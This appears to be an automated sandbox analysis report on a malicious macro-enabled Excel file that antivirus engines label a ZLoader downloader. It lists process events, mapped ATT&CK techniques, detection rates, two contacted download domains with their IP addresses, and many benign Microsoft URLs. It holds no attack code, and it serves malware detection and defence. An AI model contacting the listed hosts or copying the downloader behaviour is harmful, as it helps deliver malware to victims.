    Source: catalog-1521295750.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: catalog-1521295750.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: catalog-1521295750.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: catalog-1521295750.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: catalog-1521295750.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: catalog-1521295750.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000003.00000002.373402144.00000000043F0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.367355332.0000000004340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000003.00000002.373402144.00000000043F0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.367355332.0000000004340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000003.00000002.373402144.00000000043F0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.367355332.0000000004340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000003.00000002.373402144.00000000043F0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.367355332.0000000004340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    catalog-1521295750.xlsm30%VirustotalBrowse
    catalog-1521295750.xlsm18%MetadefenderBrowse
    catalog-1521295750.xlsm55%ReversingLabsDocument-Office.Downloader.ZLoader

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    dentistelmhurstny.com2%VirustotalBrowse
    legalopspr.com2%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    dentistelmhurstny.com
    192.185.5.2
    truefalseunknown
    legalopspr.com
    192.185.20.98
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
      high
      https://login.microsoftonline.com/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
        high
        https://shell.suite.office.com:14434BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
            high
            https://autodiscover-s.outlook.com/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                high
                https://cdn.entity.4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkey4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                      high
                      https://powerlift.acompli.net4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v14BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                        high
                        https://cortana.ai4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                  high
                                  https://api.aadrm.com/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                        high
                                        https://cr.office.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/Office4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                              high
                                              https://graph.ppe.windows.net4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplate4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetect4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                              high
                                                              https://graph.windows.net4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                        high
                                                                                        https://wus2.contentsync.4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://incidents.diagnostics.office.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                            high
                                                                                            http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4jordji.nbvt11.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.net4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.com4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drfalse
                                                                                                                high
